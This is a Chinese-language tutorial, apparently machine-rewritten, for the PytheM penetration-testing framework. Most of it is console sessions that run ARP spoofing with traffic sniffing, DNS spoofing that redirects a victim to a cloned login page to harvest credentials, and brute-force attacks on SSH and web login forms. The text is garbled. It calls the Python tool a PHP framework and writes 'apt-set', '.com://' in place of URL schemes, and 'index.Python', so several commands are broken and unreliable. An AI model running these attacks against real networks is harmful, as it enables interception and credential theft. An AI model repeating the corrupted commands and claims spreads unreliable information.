Python渗透测试框架：PytheM

"PytheM是1个PHP渗透测试架构。它只有在osnGNU/Linux Os系统软件上运作。

安裝

$sudo apt-set update

$sudo apt-set install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev

$sudo git clone https://github.Com/m4n3dw0lf/PytheM/ $Cd PytheM

$sudo pip install -r requirements.txt 

运作

$sudo ./pythem 

事例

ARP蒙骗-.com中间人攻击

指令：

pythem> get interface [+] Enter the interface: wlan0 pythem> get gateway [+] Enter the gateway: 192.168.1.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> sniff [+] Enter the filter: .com 

ARP+DNS蒙骗-重定向到仿冒的网页页面，搜集登陆凭据

应用get等复制专用工具复制你选定的网址，并布署在Apache2上

指令：

pythem> get target [+] Enter the target(s): 192.168.0.8 pythem> get interface wlan0 pythem> get gateway 192.168.0.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> dnsspoof start [+] Domain To whi spoofed: WWW.google.Com [+] iP address To whi redirected: 192.168.0.6 [+] DNS spoofing initialized. pythem> sniff dns 

SSH暴破-暴力破解

pythem> service ssh start pythem> get target [+] Enter the target(s): 127.0.0.1 pythem> get file wordlist.txt pythem> brute-force ssh [+] Enter the username To bruteforce: anon123 

web网页页面主要参数暴力破解

最先获得web网页页面登陆时的主要参数文件格式Id= value

显示信息重定向网页页面，要是定项到1个不一样的网页页面则表明猜解恰当。

指令

pythem> get target .com://127.0.0.1/ pythem> get file

[+] Enter the path To the file: wordlist.txt

pythem> brute-force webform

[+] Brute-Form authentication initialized.

[+] Enter the input Id of the username box: vSIS_Id

[+] Enter the input Id of the password box: vSIS_PASS

[+] Enter the username To brute-force the formulary: root 

网页地址內容工程爆破

pythem> get target

[+] Enter the target(s): .com://testphp.vulnweb.Com/index.Python?Id= pythem> get file 1to100.txt

pythem> brute-force 网页地址

[+] Content 网页地址 bruter initialized. 

作用

[ PytheM – Penetration Testing Framework v0.3.2 ]

help:

复印协助信息内容。